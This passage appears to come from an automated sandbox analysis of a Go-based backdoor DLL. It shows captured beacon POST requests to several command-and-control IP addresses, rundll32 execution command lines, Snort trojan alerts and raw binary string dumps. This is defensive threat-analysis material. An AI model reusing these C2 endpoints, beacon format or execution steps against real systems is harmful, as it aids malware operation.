58	192.168.2.5	49774	77.238.229.63	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:01.395051003 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: UxxjFR5w Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49775	77.238.250.123	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:03.051862955 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 5X20ayYU Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:53:03.645287991 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:53:03 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49776	195.2.70.38	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:25.727612972 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: QnqsiWp8 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49777	91.142.74.28	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:27.489494085 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 6Y2mFaMf Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49778	77.238.224.56	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:29.253784895 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: I0P0FS8J Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49779	77.238.229.63	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:30.883075953 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: PEnFMkLT Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49780	77.238.250.123	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:32.527395964 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: eUkNSG12 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:53:33.143039942 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:53:33 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49781	195.2.70.38	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:33.639770985 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ZdIGkksg Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49782	91.142.74.28	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:35.398521900 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Gs61QEee Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49783	77.238.224.56	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:37.139714003 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 6kahKGxy Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49784	77.238.229.63	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:38.752332926 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: VyCvTDYq Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49785	77.238.250.123	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:53:40.381884098 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: lyFi7mBW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:53:41.195003033 CEST	165	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:53:41 GMT Content-Length: 1 Data Raw: 0a Data Ascii:

Statistics

Click to jump to process

Memory Usage

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

High Level Behavior Distribution

• File
• Network

Click to dive into process behavior distribution

Behavior

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

Target ID:	0
Start time:	06:50:49
Start date:	15/07/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\file.dll"
Imagebase:	0xd10000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:50:49
Start date:	15/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	06:50:49
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:50:49
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Imagebase:	0x1b0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	06:50:49
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Imagebase:	0x1b0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:50:53
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Imagebase:	0x1b0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:50:59
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Imagebase:	0x1b0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	06:50:59
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Imagebase:	0x1b0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: Traffic	Snort IDS: 2855539 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2 185.231.155.234:20529 -> 192.168.2.5:49770
Source: Traffic	Snort IDS: 2855536 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1 192.168.2.5:49770 -> 185.231.155.234:20529
Source: Traffic	Snort IDS: 2855537 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2 192.168.2.5:49770 -> 185.231.155.234:20529
Source: Traffic	Snort IDS: 2855538 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1 185.231.155.234:20529 -> 192.168.2.5:49770

Source: rundll32.exe, 00000004.00000002.3937101477.000000006B56B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000005.00000002.3937025141.000000006B56B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
